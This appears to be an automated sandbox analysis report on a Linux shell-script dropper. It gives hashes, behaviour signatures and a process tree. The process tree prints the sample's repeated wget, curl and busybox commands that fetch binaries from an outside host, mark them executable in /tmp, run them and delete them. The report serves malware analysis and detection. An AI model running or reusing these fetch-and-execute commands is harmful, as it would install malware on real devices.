Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
-
Size
10KB
-
MD5
95182cb1a6c811823bdbe664fb8ebdf7
-
SHA1
05149e5200d9a87556f3bd0c65e34323d70432a5
-
SHA256
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd
-
SHA512
e4352c11296cd61aa621b235b5b606bd514e11d8ea7f1f0c995d44bffac31476e83638aa6c8f5515f7392ae680fc1be7ad4e62ea026ffe5cb2f063950e6ffa7e
-
SSDEEP
192:sFi6S/T/e2aFgAuWzGciFi6S/TG2aFgAoG:sFi6S/T/NWzhiFi6S/TM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 821 chmod 828 chmod 835 chmod 856 chmod 870 chmod 777 chmod 814 chmod 842 chmod 849 chmod 863 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl 778 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb 815 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH 822 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI 829 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q 836 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv 843 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K 850 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B 857 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg 864 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 871 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 32 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 824 wget 846 curl 848 busybox 866 wget 867 curl 873 wget 817 wget 831 wget 838 wget 841 busybox 853 curl 780 wget 855 busybox 862 busybox 874 curl 773 busybox 827 busybox 845 wget 859 wget 759 curl 818 curl 825 curl 832 curl 860 curl 804 curl 813 busybox 852 wget 869 busybox 705 wget 820 busybox 834 busybox 839 curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl curl File opened for modification /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv curl File opened for modification /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K curl File opened for modification /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 curl File opened for modification /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb curl File opened for modification /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH curl File opened for modification /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI curl File opened for modification /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q curl File opened for modification /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B curl File opened for modification /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg curl
Processes
-
/tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh/tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:700
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- System Network Configuration Discovery
PID:705
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- System Network Configuration Discovery
PID:773
-
-
/bin/chmodchmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:779
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- System Network Configuration Discovery
PID:780
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/chmodchmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:816
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- System Network Configuration Discovery
PID:820
-
-
/bin/chmodchmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- System Network Configuration Discovery
PID:827
-
-
/bin/chmodchmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:830
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- System Network Configuration Discovery
PID:831
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- System Network Configuration Discovery
PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:865
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- System Network Configuration Discovery
PID:866
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:874
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97